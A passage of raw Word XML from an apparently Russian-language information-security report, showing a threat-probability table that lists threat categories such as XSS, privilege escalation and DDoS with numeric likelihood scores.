        <w:t xml:space="preserve">— вероятность актуальности угрозы, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F74FF82" w14:textId="31F7D68B" w:rsidR="005A1278" w:rsidRDefault="008E0171" w:rsidP="00ED2018">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B66A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Первым шагом является определение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>актуальности</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> угрозы </w:t>
      </w:r>
      <w:r w:rsidRPr="00B66A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Расчет показан в таблице </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B66A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD4055" w14:textId="77777777" w:rsidR="00E27915" w:rsidRPr="00DD2F4C" w:rsidRDefault="00E27915" w:rsidP="00ED2018">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6633D55D" w14:textId="01799E51" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="002E66B7">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Таблица 3 – Определение вероятности наступления</w:t>
      </w:r>
      <w:r w:rsidR="00B343A9">
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> информационных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> угроз</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9629" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1268"/>
        <w:gridCol w:w="6235"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="1AC1AC0A" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="911"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40BD9F3D"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Номер угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4592B071"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Наименование угрозы</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2787AB41"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Вероятность наступления Y</w:t>
            </w:r>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="73B39D7A" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="574"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C00BA67"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УБИ.006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12FBC41B"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внедрения кода или данных (инъекции, эксплойты)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F9F0C9C"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="08158BDC" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="598"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CAD453C"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УБИ.041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E45E8A3"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 xml:space="preserve">Угроза межсайтового </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>скриптинга</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AFA86E3"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="3E5A302A" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="550"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DA31EC9"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УБИ.042</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35E0D0C6"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 xml:space="preserve">Угроза межсайтовой подделки запроса </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB607E9"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="58EA6EB1" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="842"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24F68FC7"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УБИ.067</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21F69AF0"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неправомерного ознакомления с защищаемой информацией (утечка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CA2B445"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="365429EB" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="826"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A55BE9"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УБИ.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46C3CACB"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обхода некорректно настроенных механизмов аутентификации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60479CB8"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="1ACC5D97" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="683"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D8E580"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УБИ.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE94420"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перехвата данных, передаваемых по сети</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BE77DA8"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="445116B9" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="545"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2F2F3E"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УБИ.122</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="063418A5"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повышения привилегий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A2317C"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="740020DE" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="698"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75E18548"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УБИ.131</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67C2FF55"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подмены субъекта сетевого доступа (спуфинг)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ECA5A89"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="41436743" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="818"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43F9E274"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УБИ.140</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64715514"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приведения системы в состояние «отказ в обслуживании» (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>DDoS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AD9D168"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="7E7AAC1A" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="956"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51DD3F25"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УБИ.153</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FCC450F"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 xml:space="preserve">Угроза усиления воздействия через сторонние серверы (ботнеты, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>криптоджекинг</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B343A9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A822964"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B343A9" w:rsidRPr="00B343A9" w14:paraId="00B2BA88" w14:textId="77777777" w:rsidTr="00B93B26">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43296C4A"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УБИ.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6235" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
